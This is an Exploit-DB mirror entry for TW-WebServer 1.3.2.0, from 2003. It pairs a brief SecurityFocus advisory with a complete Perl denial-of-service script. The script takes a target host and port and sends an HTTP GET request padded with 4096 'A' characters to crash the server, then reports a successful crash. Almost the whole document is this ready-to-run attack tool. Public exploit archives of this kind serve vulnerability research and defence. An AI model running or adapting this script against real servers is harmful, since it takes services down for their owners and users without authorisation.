exploit-db-mirror/exploits/multiple/dos/22502.pl

source: https://www.securityfocus.com/bid/7368/info

It has been reported that TW-WebServer is prone to a denial of service vulnerability. Reportedly when an excessive quantity of data is sent to the TW-Webserver as part of a malicious HTTP GET request the server will fail.

Although unconfirmed, due to the nature of this vulnerability, an attacker may have the ability to supply and execute arbitrary code. 

#!/usr/bin/perl
#
# Twilight Utilities TW-WebServer/1,3,2,0 
#
# Vulnerable systems:
# TW-WebServer/1, 3, 2, 0
# 
# Written by badpack3t <badpack3t@security-protocols.com>
# For SP Research Labs
# 04/15/2003
# 
# www.security-protocols.com
# 
# usage: 
# perl sp-urfuqed.pl <target> <port>
#
# big ups 2: acidjazz, #havoc, regulate, cr0wn, mp, lopt, 
# aitek5, rab, #darknet, dvdman, bind, and whoever the f else.

use IO::Socket;
use strict;

print ".:."x 20; print "\nTW-WebServer/1, 3, 2, 0 DoS, <badpack3t\@security-protocols.com>\n";
print ".:."x 20; print "\n\n";

if(!defined($ARGV[0] && $ARGV[1]))
{
   &usage;
}

my $host     = $ARGV[0];
my $def      = "A";
my $num	     = "4096";
my $port     = $ARGV[1];
my $urfuqed  = $def x $num;

my $tcpval   = getprotobyname('tcp');
my $serverIP = inet_aton($host);
my $serverAddr = sockaddr_in($ARGV[1], $serverIP);
my $protocol_name = "tcp";

my $iaddr    = inet_aton($host) 	   || die ("host was not found: $host");
my $paddr    = sockaddr_in($port, $iaddr)  || die ("you did something wrong stupid... exiting...");
my $proto    = getprotobyname('tcp')       || die ("cannot get protocol");
socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die ("socket could not open: $host");
connect(SOCK, $paddr) 			   || die ("cannot connect to: $host");

my $submit   = "GET $urfuqed HTTP/1.0\r\n\r\n";   
send(SOCK,$submit,0);
close(SOCK);

sub usage {die("\n\nUsage: perl $0 <target_host> <port>\n\n");}

print "\n.:.:.:.:.:.:.:.:.:.:.:.";
print "\ncrash was successful ~!\n";
print "\.:.:.:.:.:.:.:.:.:.:.:.\n";